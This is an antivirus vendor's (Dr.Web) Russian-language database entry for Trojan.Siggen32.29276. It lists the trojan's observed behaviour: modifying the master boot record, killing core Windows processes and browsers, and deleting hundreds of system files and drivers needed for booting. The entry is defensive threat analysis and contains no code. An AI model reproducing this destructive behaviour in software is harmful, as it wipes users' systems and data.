Поддержка
Круглосуточная поддержка

Позвоните

Бесплатно по России:
8-800-333-79-32

ЧаВо | Форум

Ваши запросы

  • Все: -
  • Незакрытые: -
  • Последний: -

Позвоните

Бесплатно по России:
8-800-333-79-32

Свяжитесь с нами Незакрытые запросы: 

Профиль

Профиль

Trojan.Siggen32.29276

Добавлен в вирусную базу Dr.Web: 2026-03-19

Описание добавлено:

Техническая информация

Для обеспечения автозапуска и распространения
Модифицирует главную загрузочную запись (MBR).
Вредоносные функции
Запускает большое число процессов
Завершает или пытается завершить
следующие системные процессы:
  • <SYSTEM32>\dwm.exe
  • <SYSTEM32>\winlogon.exe
  • <SYSTEM32>\fontdrvhost.exe
  • <SYSTEM32>\sihost.exe
  • <SYSTEM32>\svchost.exe
  • %WINDIR%\explorer.exe
  • %WINDIR%\systemapps\microsoft.windows.startmenuexperiencehost_cw5n1h2txyewy\startmenuexperiencehost.exe
  • <SYSTEM32>\runtimebroker.exe
  • <SYSTEM32>\dllhost.exe
  • <SYSTEM32>\securityhealthsystray.exe
  • <SYSTEM32>\oobe\useroobebroker.exe
  • <SYSTEM32>\reg.exe
  • <SYSTEM32>\cmd.exe
  • <SYSTEM32>\csrss.exe
следующие пользовательские процессы:
  • iexplore.exe
  • firefox.exe
Изменения в файловой системе
Создает следующие файлы
  • nul
Удаляет следующие системные файлы
  • <SYSTEM32>\winload.exe
  • <SYSTEM32>\winload.efi
  • <SYSTEM32>\ntoskrnl.exe
  • <SYSTEM32>\hal.dll
  • <SYSTEM32>\kdcom.dll
  • <DRIVERS>\disk.sys
  • <DRIVERS>\partmgr.sys
  • <DRIVERS>\volume.sys
  • <DRIVERS>\afd.sys
  • <DRIVERS>\afunix.sys
  • <DRIVERS>\ahcache.sys
  • <DRIVERS>\bam.sys
  • <DRIVERS>\beep.sys
  • <DRIVERS>\bindflt.sys
  • <DRIVERS>\bowser.sys
  • <DRIVERS>\cdfs.sys
  • <DRIVERS>\cdrom.sys
  • <DRIVERS>\cimfs.sys
  • <DRIVERS>\cldflt.sys
  • <SYSTEM32>\aadcloudap.dll
  • <DRIVERS>\condrv.sys
  • <DRIVERS>\crashdmp.sys
  • <DRIVERS>\csc.sys
  • <DRIVERS>\dfsc.sys
  • <SYSTEM32>\abovelockapphost.dll
  • <SYSTEM32>\acpbackgroundmanagerpolicy.dll
  • <DRIVERS>\diskdump.sys
  • <DRIVERS>\dumpfve.sys
  • <SYSTEM32>\actioncenter.dll
  • <SYSTEM32>\activationmanager.dll
  • %WINDIR%\syswow64\advapi32.dll
  • <SYSTEM32>\actxprxy.dll
  • <DRIVERS>\dxgkrnl.sys
  • <DRIVERS>\dxgmms2.sys
  • <SYSTEM32>\adhapi.dll
  • <SYSTEM32>\adhsvc.dll
  • <DRIVERS>\fastfat.sys
  • <DRIVERS>\fdc.sys
  • <DRIVERS>\filecrypt.sys
  • %WINDIR%\syswow64\apphelp.dll
  • %WINDIR%\syswow64\appresolver.dll
  • <SYSTEM32>\advapi32.dll
  • <DRIVERS>\flpydisk.sys
  • <SYSTEM32>\aepic.dll
  • <DRIVERS>\gpuenergydrv.sys
  • <SYSTEM32>\amsi.dll
  • <DRIVERS>\hidclass.sys
  • %WINDIR%\syswow64\atlthunk.dll
  • <SYSTEM32>\apmon.dll
  • <DRIVERS>\hidparse.sys
  • <SYSTEM32>\appcontracts.dll
  • <DRIVERS>\hidusb.sys
  • <SYSTEM32>\appextension.dll
  • <SYSTEM32>\apphelp.dll
  • <DRIVERS>\http.sys
  • <SYSTEM32>\appinfo.dll
  • <DRIVERS>\i8042prt.sys
  • <SYSTEM32>\appinfoext.dll
  • <SYSTEM32>\applicationframe.dll
  • <SYSTEM32>\appmon.dll
  • <SYSTEM32>\appointmentactivation.dll
  • <SYSTEM32>\appresolver.dll
  • <DRIVERS>\intelppm.sys
  • <DRIVERS>\kbdclass.sys
  • <DRIVERS>\kdnic.sys
  • <DRIVERS>\ks.sys
  • <DRIVERS>\lltdio.sys
  • <DRIVERS>\lsi_sas.sys
  • <SYSTEM32>\appxalluserstore.dll
  • %WINDIR%\syswow64\bcp47langs.dll
  • %WINDIR%\syswow64\bcrypt.dll
  • <DRIVERS>\luafv.sys
  • <DRIVERS>\mmcss.sys
  • <DRIVERS>\monitor.sys
  • <DRIVERS>\mouclass.sys
  • <DRIVERS>\mouhid.sys
  • <DRIVERS>\mpsdrv.sys
  • <DRIVERS>\mrxsmb.sys
  • <DRIVERS>\mrxsmb20.sys
  • <SYSTEM32>\appxdeploymentclient.dll
  • %WINDIR%\syswow64\bcryptprimitives.dll
  • <DRIVERS>\msfs.sys
  • <DRIVERS>\mslldp.sys
  • <DRIVERS>\msquic.sys
  • <DRIVERS>\mssmbios.sys
  • <DRIVERS>\ndiscap.sys
  • <DRIVERS>\ndisvirtualbus.sys
  • <DRIVERS>\ndu.sys
  • <DRIVERS>\netbios.sys
  • <DRIVERS>\netbt.sys
  • <DRIVERS>\npfs.sys
  • <DRIVERS>\npsvctrig.sys
  • <DRIVERS>\nsiproxy.sys
  • <DRIVERS>\null.sys
  • <DRIVERS>\pacer.sys
  • <SYSTEM32>\atlthunk.dll
  • <SYSTEM32>\audioendpointbuilder.dll
  • <DRIVERS>\peauth.sys
  • %WINDIR%\syswow64\cfgmgr32.dll
  • %WINDIR%\syswow64\clbcatq.dll
  • <SYSTEM32>\audioses.dll
  • <SYSTEM32>\audiosrv.dll
  • <SYSTEM32>\audiosrvpolicymanager.dll
  • %WINDIR%\syswow64\combase.dll
  • %WINDIR%\syswow64\comctl32.dll
  • %WINDIR%\syswow64\comdlg32.dll
  • %WINDIR%\syswow64\coml2.dll
  • <SYSTEM32>\authz.dll
  • <SYSTEM32>\avrt.dll
  • <SYSTEM32>\backgroundmediapolicy.dll
  • <SYSTEM32>\cmd.exe
  • <SYSTEM32>\basesrv.dll
  • <SYSTEM32>\batmeter.dll
  • <SYSTEM32>\conhost.exe
  • <SYSTEM32>\bcd.dll
  • <SYSTEM32>\bcp47langs.dll
  • <SYSTEM32>\bcp47mrm.dll
  • <SYSTEM32>\csrss.exe
  • <SYSTEM32>\bcrypt.dll
  • <SYSTEM32>\bcryptprimitives.dll
  • <DRIVERS>\rdbss.sys
  • <DRIVERS>\rdpbus.sys
  • <SYSTEM32>\bfe.dll
  • <SYSTEM32>\bi.dll
  • <DRIVERS>\rspndr.sys
  • <DRIVERS>\rtnic64.sys
  • <SYSTEM32>\bisrv.dll
  • <SYSTEM32>\biwinrt.dll
  • <SYSTEM32>\bluetoothapis.dll
  • <SYSTEM32>\dllhost.exe
  • <SYSTEM32>\brokerlib.dll
  • %WINDIR%\syswow64\coremessaging.dll
  • %WINDIR%\syswow64\coreuicomponents.dll
  • <SYSTEM32>\dwm.exe
  • <SYSTEM32>\bthradiomedia.dll
  • <SYSTEM32>\cabinet.dll
  • %WINDIR%\syswow64\crypt32.dll
  • %WINDIR%\syswow64\cryptbase.dll
  • %WINDIR%\syswow64\cryptnet.dll
  • %WINDIR%\syswow64\cryptsp.dll
  • <DRIVERS>\srv2.sys
  • <DRIVERS>\srvnet.sys
  • %WINDIR%\syswow64\d2d1.dll
  • <DRIVERS>\storqosflt.sys
  • <SYSTEM32>\fontdrvhost.exe
  • <SYSTEM32>\capauthz.dll
  • %WINDIR%\syswow64\d3d10warp.dll
  • %WINDIR%\syswow64\d3d11.dll
  • %WINDIR%\syswow64\dataexchange.dll
  • %WINDIR%\syswow64\dcomp.dll
  • %WINDIR%\syswow64\dhcpcsvc.dll
  • %WINDIR%\syswow64\dhcpcsvc6.dll
  • %WINDIR%\syswow64\difxapi.dll
  • <DRIVERS>\tbs.sys
  • <DRIVERS>\tcpipreg.sys
  • <DRIVERS>\tdi.sys
  • %WINDIR%\syswow64\directmanipulation.dll
  • <DRIVERS>\tdx.sys
  • <SYSTEM32>\cbdhsvc.dll
  • <SYSTEM32>\cdd.dll
  • <DRIVERS>\vid.sys
  • <DRIVERS>\vwififlt.sys
  • <SYSTEM32>\cdp.dll
  • <DRIVERS>\watchdog.sys
  • <SYSTEM32>\certca.dll
  • <SYSTEM32>\lsass.exe
  • %WINDIR%\syswow64\dnsapi.dll
  • <DRIVERS>\wcifs.sys
  • %WINDIR%\syswow64\dpapi.dll
  • <DRIVERS>\winhvr.sys
  • <SYSTEM32>\certenroll.dll
  • <DRIVERS>\wpdupfltr.sys
  • <DRIVERS>\wudfrd.sys
  • <SYSTEM32>\cfgmgr32.dll
  • %WINDIR%\syswow64\dwmapi.dll
  • %WINDIR%\syswow64\dwrite.dll
  • %WINDIR%\syswow64\dxcore.dll
  • %WINDIR%\syswow64\dxgi.dll
  • <SYSTEM32>\cflapi.dll
  • %WINDIR%\syswow64\edputil.dll
  • %WINDIR%\syswow64\fwpuclnt.dll
  • %WINDIR%\syswow64\gdi32.dll
  • %WINDIR%\syswow64\gdi32full.dll
  • %WINDIR%\syswow64\gdiplus.dll
  • <SYSTEM32>\clbcatq.dll
  • <SYSTEM32>\cldapi.dll
  • %WINDIR%\syswow64\ieapfltr.dll
  • <SYSTEM32>\clipboardserver.dll
  • <SYSTEM32>\clipc.dll
  • %WINDIR%\syswow64\ieframe.dll
  • %WINDIR%\syswow64\ieproxy.dll
  • %WINDIR%\syswow64\iertutil.dll
  • <SYSTEM32>\cloudap.dll
  • %WINDIR%\syswow64\ieui.dll
  • %WINDIR%\syswow64\imagehlp.dll
  • %WINDIR%\syswow64\imm32.dll
  • <SYSTEM32>\cloudexperiencehostbroker.dll
  • <SYSTEM32>\clusapi.dll
  • %WINDIR%\syswow64\iphlpapi.dll
  • <SYSTEM32>\cmintegrator.dll
  • <SYSTEM32>\coloradapterclient.dll
  • <SYSTEM32>\combase.dll
  • %WINDIR%\syswow64\jscript9.dll
  • <SYSTEM32>\comctl32.dll
  • <SYSTEM32>\comdlg32.dll
  • <SYSTEM32>\coml2.dll
  • <SYSTEM32>\reg.exe
  • <SYSTEM32>\comppkgsup.dll
  • <SYSTEM32>\computenetwork.dll
  • <SYSTEM32>\constraintindex.search.dll
  • <SYSTEM32>\container.dll
  • <SYSTEM32>\coreaudiopolicymanagerext.dll
  • <SYSTEM32>\coremessaging.dll
  • <SYSTEM32>\coreshellextframework.dll
  • <SYSTEM32>\coreuicomponents.dll
  • <SYSTEM32>\credui.dll
  • <SYSTEM32>\crypt32.dll
  • <SYSTEM32>\cryptbase.dll
  • <SYSTEM32>\cryptcatsvc.dll
  • <SYSTEM32>\cryptdll.dll
  • <SYSTEM32>\cryptnet.dll
  • <SYSTEM32>\cryptngc.dll
  • <SYSTEM32>\cryptsp.dll
  • <SYSTEM32>\cryptsvc.dll
  • <SYSTEM32>\crypttpmeksvc.dll
  • <SYSTEM32>\cryptxml.dll
  • <SYSTEM32>\cscapi.dll
  • <SYSTEM32>\cscobj.dll
  • <SYSTEM32>\runtimebroker.exe
  • <SYSTEM32>\cscui.dll
  • %WINDIR%\syswow64\kernel.appcore.dll
  • %WINDIR%\syswow64\kernel32.dll
  • %WINDIR%\syswow64\kernelbase.dll
  • <SYSTEM32>\csrsrv.dll
  • <SYSTEM32>\csystemeventsbrokerclient.dll
  • <SYSTEM32>\d2d1.dll
  • <SYSTEM32>\securityhealthservice.exe
  • <SYSTEM32>\securityhealthsystray.exe
  • <SYSTEM32>\services.exe
  • <SYSTEM32>\sihost.exe
  • <SYSTEM32>\smss.exe
  • <SYSTEM32>\spoolsv.exe
  • <SYSTEM32>\d3d10warp.dll
  • <SYSTEM32>\d3d11.dll
  • <SYSTEM32>\d3d9.dll
  • <SYSTEM32>\sppsvc.exe
  • <SYSTEM32>\svchost.exe
  • <SYSTEM32>\taskhostw.exe
  • <SYSTEM32>\d3dcompiler_47.dll
  • <SYSTEM32>\dab.dll
  • <SYSTEM32>\dabapi.dll
  • %WINDIR%\syswow64\mlang.dll
  • <SYSTEM32>\dataexchange.dll
  • <SYSTEM32>\daxexec.dll
  • <SYSTEM32>\dbgcore.dll
  • <SYSTEM32>\dbghelp.dll
  • <SYSTEM32>\dcomp.dll
  • %WINDIR%\syswow64\msasn1.dll
  • <SYSTEM32>\desktopshellext.dll
  • <SYSTEM32>\devdispitemprovider.dll
  • <SYSTEM32>\deviceassociation.dll
  • %WINDIR%\syswow64\msctf.dll
  • %WINDIR%\syswow64\mshtml.dll
  • <SYSTEM32>\devobj.dll
  • <SYSTEM32>\dhcpcore.dll
  • <SYSTEM32>\dhcpcore6.dll
  • %WINDIR%\syswow64\msimtf.dll
  • %WINDIR%\syswow64\msiso.dll
  • %WINDIR%\syswow64\mskeyprotect.dll
  • <SYSTEM32>\dhcpcsvc.dll
  • <SYSTEM32>\dhcpcsvc6.dll
  • <SYSTEM32>\wininit.exe
  • <SYSTEM32>\winlogon.exe
  • %WINDIR%\syswow64\msvcp_win.dll
  • %WINDIR%\syswow64\msvcrt.dll
  • %WINDIR%\syswow64\mswsock.dll
  • %WINDIR%\syswow64\msxml6.dll
  • %WINDIR%\syswow64\ncrypt.dll
  • %WINDIR%\syswow64\ncryptsslp.dll
  • %WINDIR%\syswow64\netapi32.dll
  • <SYSTEM32>\dictationmanager.dll
  • <SYSTEM32>\difxapi.dll
  • %WINDIR%\syswow64\netutils.dll
  • %WINDIR%\syswow64\ninput.dll
  • <SYSTEM32>\directmanipulation.dll
  • <SYSTEM32>\wudfhost.exe
  • <SYSTEM32>\dispbroker.desktop.dll
  • <SYSTEM32>\dispbroker.dll
  • %WINDIR%\syswow64\normaliz.dll
  • %WINDIR%\syswow64\nsi.dll
  • %WINDIR%\syswow64\ntasn1.dll
  • %WINDIR%\syswow64\ntdll.dll
  • %WINDIR%\syswow64\ntmarta.dll
  • <SYSTEM32>\dll64.dll
  • %WINDIR%\syswow64\ole32.dll
  • %WINDIR%\syswow64\oleaut32.dll
  • %WINDIR%\syswow64\ondemandconnroutehelper.dll
  • %WINDIR%\syswow64\onecorecommonproxystub.dll
  • <SYSTEM32>\dnsapi.dll
  • %WINDIR%\syswow64\powrprof.dll
  • %WINDIR%\syswow64\profapi.dll
  • %WINDIR%\syswow64\propsys.dll
  • <SYSTEM32>\dnsrslvr.dll
  • %WINDIR%\syswow64\psapi.dll
  • %WINDIR%\syswow64\rasadhlp.dll
  • <SYSTEM32>\dpapi.dll
  • <SYSTEM32>\dpapisrv.dll
  • %WINDIR%\syswow64\rpcrt4.dll
  • %WINDIR%\syswow64\rsaenh.dll
  • <SYSTEM32>\drvstore.dll
  • %WINDIR%\syswow64\schannel.dll
  • %WINDIR%\syswow64\sechost.dll
  • <SYSTEM32>\dsparse.dll
  • <SYSTEM32>\dsreg.dll
  • <SYSTEM32>\dsrole.dll
  • %WINDIR%\syswow64\secur32.dll
  • <SYSTEM32>\dssenh.dll
  • %WINDIR%\syswow64\setupapi.dll
  • %WINDIR%\syswow64\shcore.dll
  • %WINDIR%\syswow64\shell32.dll
  • %WINDIR%\syswow64\shlwapi.dll
  • <SYSTEM32>\dui70.dll
  • %WINDIR%\syswow64\slc.dll
  • <SYSTEM32>\dusmapi.dll
  • <SYSTEM32>\dwmapi.dll
  • <SYSTEM32>\dwmcore.dll
  • <SYSTEM32>\dwmghost.dll
  • <SYSTEM32>\dwminit.dll
  • <SYSTEM32>\dwmredir.dll
  • <SYSTEM32>\dwrite.dll
  • <SYSTEM32>\dxcore.dll
  • %WINDIR%\syswow64\sppc.dll
  • %WINDIR%\syswow64\srpapi.dll
  • %WINDIR%\syswow64\sspicli.dll
  • <SYSTEM32>\dxgi.dll
  • <SYSTEM32>\dxp.dll
  • %WINDIR%\syswow64\sxs.dll
  • <SYSTEM32>\dxva2.dll
  • %WINDIR%\syswow64\textinputframework.dll
  • <SYSTEM32>\edputil.dll
  • <SYSTEM32>\efslsaext.dll
  • <SYSTEM32>\efsutil.dll
  • %WINDIR%\syswow64\twinapi.appcore.dll
  • %WINDIR%\syswow64\ucrtbase.dll
  • <SYSTEM32>\ehstorshell.dll
  • %WINDIR%\syswow64\umpdc.dll
  • <SYSTEM32>\embeddedmodesvcapi.dll
  • %WINDIR%\syswow64\urlmon.dll
  • %WINDIR%\syswow64\user32.dll
  • %WINDIR%\syswow64\userenv.dll
  • %WINDIR%\syswow64\uxtheme.dll
  • <SYSTEM32>\es.dll
  • <SYSTEM32>\esent.dll
  • <SYSTEM32>\ethernetmediamanager.dll
  • <SYSTEM32>\eventaggregation.dll
  • <SYSTEM32>\evr.dll
  • <SYSTEM32>\execmodelclient.dll
  • <SYSTEM32>\execmodelproxy.dll
  • <SYSTEM32>\explorerframe.dll
  • %WINDIR%\syswow64\version.dll
  • <SYSTEM32>\faultrep.dll
  • %WINDIR%\syswow64\webio.dll
  • %WINDIR%\syswow64\win32u.dll
  • <SYSTEM32>\fhcfg.dll
  • %WINDIR%\syswow64\windows.staterepositoryps.dll
  • %WINDIR%\syswow64\windows.storage.dll
  • <SYSTEM32>\firewallapi.dll
  • <SYSTEM32>\flightsettings.dll
  • <SYSTEM32>\fltlib.dll
  • %WINDIR%\syswow64\winhttp.dll
  • %WINDIR%\syswow64\wininet.dll
  • %WINDIR%\syswow64\winnsi.dll
  • <SYSTEM32>\fontgroupsoverride.dll
  • <SYSTEM32>\framedynos.dll
  • %WINDIR%\syswow64\wintrust.dll
  • %WINDIR%\syswow64\wintypes.dll
  • %WINDIR%\syswow64\wkscli.dll
  • %WINDIR%\syswow64\wldap32.dll
  • %WINDIR%\syswow64\wldp.dll
  • <SYSTEM32>\fveapi.dll
  • <SYSTEM32>\fwbase.dll
  • <SYSTEM32>\fwpolicyiomgr.dll
  • <SYSTEM32>\fwpuclnt.dll
  • <SYSTEM32>\fxsmon.dll
  • <SYSTEM32>\gameinput.dll
  • %WINDIR%\syswow64\ws2_32.dll
  • <SYSTEM32>\gdi32.dll
  • <SYSTEM32>\gdi32full.dll
  • <SYSTEM32>\gdiplus.dll
  • <SYSTEM32>\globinputhost.dll
  • <SYSTEM32>\gmsaclient.dll
  • <SYSTEM32>\gpapi.dll
  • <SYSTEM32>\hcproviders.dll
  • <SYSTEM32>\hid.dll
  • <SYSTEM32>\holographicextensions.dll
  • <SYSTEM32>\httpprxc.dll
  • <SYSTEM32>\httpprxm.dll
  • <SYSTEM32>\idstore.dll
  • <SYSTEM32>\ieapfltr.dll
  • <SYSTEM32>\ieproxy.dll
  • <SYSTEM32>\iertutil.dll
  • <SYSTEM32>\ieui.dll
  • <SYSTEM32>\imagehlp.dll
  • <SYSTEM32>\imapi2.dll
  • <SYSTEM32>\imm32.dll
  • <SYSTEM32>\inetpp.dll
  • <SYSTEM32>\inputcloudstore.dll
  • <SYSTEM32>\inputhost.dll
  • <SYSTEM32>\inputlocalemanager.dll
  • <SYSTEM32>\inputservice.dll
  • <SYSTEM32>\inputswitch.dll
  • <SYSTEM32>\oobe\useroobebroker.exe
  • <SYSTEM32>\iphlpapi.dll
  • <SYSTEM32>\iphlpsvc.dll
  • <SYSTEM32>\ism.dll
  • <SYSTEM32>\joinutil.dll
  • <SYSTEM32>\kbdus.dll
  • <SYSTEM32>\kdcpw.dll
  • <SYSTEM32>\kerbclientshared.dll
  • <SYSTEM32>\kerberos.dll
  • <SYSTEM32>\kernel.appcore.dll
  • <SYSTEM32>\kernel32.dll
  • <SYSTEM32>\kernelbase.dll
  • <SYSTEM32>\languageoverlayutil.dll
  • <SYSTEM32>\licensemanagerapi.dll
  • <SYSTEM32>\linkinfo.dll
  • <SYSTEM32>\lmhsvc.dll
  • <SYSTEM32>\localspl.dll
  • <SYSTEM32>\logoncli.dll
  • <SYSTEM32>\lsasrv.dll
  • <SYSTEM32>\lsm.dll
  • <SYSTEM32>\mf.dll
  • <SYSTEM32>\mfperfhelper.dll
  • <SYSTEM32>\mfplat.dll
  • <SYSTEM32>\mi.dll
  • <SYSTEM32>\microsoftaccountcloudap.dll
  • <SYSTEM32>\miutils.dll
  • <SYSTEM32>\mlang.dll
  • <SYSTEM32>\mmdevapi.dll
  • <SYSTEM32>\mobilenetworking.dll
  • <SYSTEM32>\modernexecserver.dll
  • <SYSTEM32>\mpr.dll
  • <SYSTEM32>\mpssvc.dll
  • <SYSTEM32>\mrmcorer.dll
  • <SYSTEM32>\msasn1.dll
  • <SYSTEM32>\mscms.dll
  • <SYSTEM32>\msctf.dll
  • <SYSTEM32>\msctfmonitor.dll
  • <SYSTEM32>\msftedit.dll
  • <SYSTEM32>\mshtml.dll
  • <SYSTEM32>\msi.dll
  • <SYSTEM32>\msimg32.dll
  • <SYSTEM32>\msiso.dll
  • <SYSTEM32>\mskeyprotect.dll
  • <SYSTEM32>\msmpeg2vdec.dll
  • <SYSTEM32>\msprivs.dll
  • <SYSTEM32>\mssrch.dll
  • <SYSTEM32>\msutb.dll
  • <SYSTEM32>\msv1_0.dll
  • <SYSTEM32>\msvcp110_win.dll
  • <SYSTEM32>\msvcp140.dll
  • <SYSTEM32>\msvcp_win.dll
  • <SYSTEM32>\msvcrt.dll
  • <SYSTEM32>\msvp9dec.dll
  • <SYSTEM32>\mswb7.dll
  • <SYSTEM32>\mswsock.dll
  • <SYSTEM32>\msxml6.dll
  • <SYSTEM32>\mtf.dll
  • <SYSTEM32>\mtfserver.dll
  • <SYSTEM32>\napinsp.dll
  • <SYSTEM32>\ncobjapi.dll
  • <SYSTEM32>\ncrypt.dll
  • <SYSTEM32>\ncryptprov.dll
  • <SYSTEM32>\ncryptsslp.dll
  • <SYSTEM32>\ncsi.dll
  • <SYSTEM32>\negoexts.dll
  • <SYSTEM32>\netapi32.dll
  • <SYSTEM32>\netjoin.dll
  • <SYSTEM32>\netlogon.dll
  • <SYSTEM32>\netprofm.dll
  • <SYSTEM32>\netprofmsvc.dll
  • <SYSTEM32>\netprovfw.dll
  • <SYSTEM32>\netsetupapi.dll
  • <SYSTEM32>\netutils.dll
  • <SYSTEM32>\networkuxbroker.dll
  • <SYSTEM32>\nfcradiomedia.dll
  • <SYSTEM32>\ninput.dll
  • <SYSTEM32>\nlaapi.dll
  • <SYSTEM32>\nlasvc.dll
  • <SYSTEM32>\normaliz.dll
  • <SYSTEM32>\notificationcontroller.dll
  • <SYSTEM32>\notificationcontrollerps.dll
  • <SYSTEM32>\notificationplatformcomponent.dll
  • <SYSTEM32>\npmproxy.dll
  • <SYSTEM32>\npsm.dll
  • <SYSTEM32>\nrpsrv.dll
  • <SYSTEM32>\nsi.dll
  • <SYSTEM32>\nsisvc.dll
  • <SYSTEM32>\ntasn1.dll
  • <SYSTEM32>\ntdll.dll
  • <SYSTEM32>\ntlmshared.dll
  • <SYSTEM32>\ntmarta.dll
  • <SYSTEM32>\ntshrui.dll
  • <SYSTEM32>\ole32.dll
  • <SYSTEM32>\oleacc.dll
  • <SYSTEM32>\oleaut32.dll
  • <SYSTEM32>\ondemandbrokerclient.dll
  • <SYSTEM32>\ondemandconnroutehelper.dll
  • <SYSTEM32>\onecorecommonproxystub.dll
  • <SYSTEM32>\onecoreuapcommonproxystub.dll
  • <SYSTEM32>\packagestatechangehandler.dll
  • <SYSTEM32>\pcacli.dll
  • <SYSTEM32>\pcpksp.dll
  • <SYSTEM32>\pcshellcommonproxystub.dll
  • <SYSTEM32>\pdh.dll
  • <SYSTEM32>\photometadatahandler.dll
  • <SYSTEM32>\pkeyhelper.dll
  • <SYSTEM32>\pku2u.dll
  • <SYSTEM32>\playsndsrv.dll
  • <SYSTEM32>\pnidui.dll
  • <SYSTEM32>\pnrpnsp.dll
  • <SYSTEM32>\policymanager.dll
  • <SYSTEM32>\portabledeviceapi.dll
  • <SYSTEM32>\portabledeviceclassextension.dll
  • <SYSTEM32>\portabledevicetypes.dll
  • <SYSTEM32>\powrprof.dll
  • <SYSTEM32>\printisolationproxy.dll
  • <SYSTEM32>\prm0009.dll
  • <SYSTEM32>\prnfldr.dll
  • <SYSTEM32>\profapi.dll
  • <SYSTEM32>\profext.dll
  • <SYSTEM32>\profsvc.dll
  • <SYSTEM32>\profsvcext.dll
  • <SYSTEM32>\propsys.dll
  • <SYSTEM32>\proximitycommon.dll
  • <SYSTEM32>\proximitycommonpal.dll
  • <SYSTEM32>\proximityservice.dll
  • <SYSTEM32>\proximityservicepal.dll
  • <SYSTEM32>\psapi.dll
  • <SYSTEM32>\psmserviceexthost.dll
  • <SYSTEM32>\psmsrv.dll
  • <SYSTEM32>\quiethours.dll
  • <SYSTEM32>\rasadhlp.dll
  • <SYSTEM32>\resourcepolicyclient.dll
  • <SYSTEM32>\resourcepolicyserver.dll
  • <SYSTEM32>\resutils.dll
  • <SYSTEM32>\rmapi.dll
  • <SYSTEM32>\rmclient.dll
  • <SYSTEM32>\rpcepmap.dll
  • <SYSTEM32>\rpcrt4.dll
  • <SYSTEM32>\rpcrtremote.dll
  • <SYSTEM32>\rpcss.dll
  • <SYSTEM32>\rsaenh.dll
  • <SYSTEM32>\rtmediaframe.dll
  • <SYSTEM32>\rtworkq.dll
  • <SYSTEM32>\samcli.dll
  • <SYSTEM32>\samlib.dll
  • <SYSTEM32>\samsrv.dll
  • <SYSTEM32>\scecli.dll
  • <SYSTEM32>\scesrv.dll
  • <SYSTEM32>\schannel.dll
  • <SYSTEM32>\schedsvc.dll
  • <SYSTEM32>\sebbackgroundmanagerpolicy.dll
  • <SYSTEM32>\sechost.dll
  • <SYSTEM32>\secur32.dll
  • <SYSTEM32>\securetimeaggregator.dll
  • <SYSTEM32>\securitycenterbroker.dll
  • <SYSTEM32>\securitycenterbrokerps.dll
  • <SYSTEM32>\securityhealthproxystub.dll
  • <SYSTEM32>\securityhealthsso.dll
  • <SYSTEM32>\semgrsvc.dll
  • <SYSTEM32>\sens.dll
  • <SYSTEM32>\settingmonitor.dll
  • <SYSTEM32>\settingsync.dll
  • <SYSTEM32>\settingsynccore.dll
  • <SYSTEM32>\setupapi.dll
  • <SYSTEM32>\sfc_os.dll
  • <SYSTEM32>\shacctprofile.dll
  • <SYSTEM32>\sharehost.dll
  • <SYSTEM32>\shcore.dll
  • <SYSTEM32>\shdocvw.dll
  • <SYSTEM32>\shell32.dll
  • <SYSTEM32>\shellcommoncommonproxystub.dll
  • <SYSTEM32>\shlwapi.dll
  • <SYSTEM32>\shsvcs.dll
  • <SYSTEM32>\slc.dll
  • <SYSTEM32>\smartcardbackgroundpolicy.dll
  • <SYSTEM32>\smartscreenps.dll
  • <SYSTEM32>\sndvolsso.dll
  • <SYSTEM32>\snmpapi.dll
  • <SYSTEM32>\spinf.dll
  • <SYSTEM32>\spoolss.dll
  • <SYSTEM32>\spp.dll
  • <SYSTEM32>\sppc.dll
  • <SYSTEM32>\sppobjs.dll
  • <SYSTEM32>\sppwinob.dll
  • <SYSTEM32>\srchadmin.dll
  • <SYSTEM32>\srvcli.dll
  • <SYSTEM32>\srvsvc.dll
  • <SYSTEM32>\sscore.dll
  • <SYSTEM32>\sscoreext.dll
  • <SYSTEM32>\ssdpapi.dll
  • <SYSTEM32>\sspicli.dll
  • <SYSTEM32>\sspisrv.dll
  • <SYSTEM32>\starttiledata.dll
  • <SYSTEM32>\staterepository.core.dll
  • <SYSTEM32>\stobject.dll
  • <SYSTEM32>\storageusage.dll
  • <SYSTEM32>\storsvc.dll
  • <SYSTEM32>\structuredquery.dll
  • <SYSTEM32>\sxs.dll
  • <SYSTEM32>\sxssrv.dll
  • <SYSTEM32>\synccenter.dll
  • <SYSTEM32>\syncreg.dll
  • <SYSTEM32>\sysntfy.dll
  • <SYSTEM32>\systemeventsbrokerserver.dll
  • <SYSTEM32>\taskcomp.dll
  • <SYSTEM32>\taskflowdataengine.dll
  • <SYSTEM32>\taskschd.dll
  • <SYSTEM32>\tbs.dll
  • <SYSTEM32>\tcpmon.dll
  • <SYSTEM32>\tdh.dll
  • <SYSTEM32>\textinputframework.dll
  • <SYSTEM32>\textinputmethodformatter.dll
  • <SYSTEM32>\textshaping.dll
  • <SYSTEM32>\threadpoolwinrt.dll
  • <SYSTEM32>\thumbcache.dll
  • <SYSTEM32>\tiledatarepository.dll
  • <SYSTEM32>\timebrokerclient.dll
  • <SYSTEM32>\timebrokerserver.dll
  • <SYSTEM32>\tokenbinding.dll
  • <SYSTEM32>\tokenbroker.dll
  • <SYSTEM32>\tquery.dll
  • <SYSTEM32>\tspkg.dll
  • <SYSTEM32>\twinapi.appcore.dll
  • <SYSTEM32>\twinapi.dll
  • <SYSTEM32>\twinui.appcore.dll
  • <SYSTEM32>\twinui.dll
  • <SYSTEM32>\twinui.pcshell.dll
  • <SYSTEM32>\ubpm.dll
  • <SYSTEM32>\ucrtbase.dll
  • <SYSTEM32>\udwm.dll
  • <SYSTEM32>\uiamanager.dll
  • <SYSTEM32>\uianimation.dll
  • <SYSTEM32>\uiautomationcore.dll
  • <SYSTEM32>\umpdc.dll
  • <SYSTEM32>\umpnpmgr.dll
  • <SYSTEM32>\umpo.dll
  • <SYSTEM32>\umpoext.dll
  • <SYSTEM32>\urlmon.dll
  • <SYSTEM32>\usbmon.dll
  • <SYSTEM32>\user32.dll
  • <SYSTEM32>\userenv.dll
  • <SYSTEM32>\usermgr.dll
  • <SYSTEM32>\usermgrcli.dll
  • <SYSTEM32>\usermgrproxy.dll
  • <SYSTEM32>\usp10.dll
  • <SYSTEM32>\uxinit.dll
  • <SYSTEM32>\uxtheme.dll
  • <SYSTEM32>\vaultcli.dll
  • <SYSTEM32>\vbsapi.dll
  • <SYSTEM32>\vcruntime140.dll
  • <SYSTEM32>\vcruntime140_1.dll
  • <SYSTEM32>\version.dll
  • <SYSTEM32>\vertdll.dll
  • <SYSTEM32>\virtualmonitormanager.dll
  • <SYSTEM32>\vssapi.dll
  • <SYSTEM32>\vsstrace.dll
  • <SYSTEM32>\wbemcomn.dll
  • <SYSTEM32>\wcmcsp.dll
  • <SYSTEM32>\wcmsvc.dll
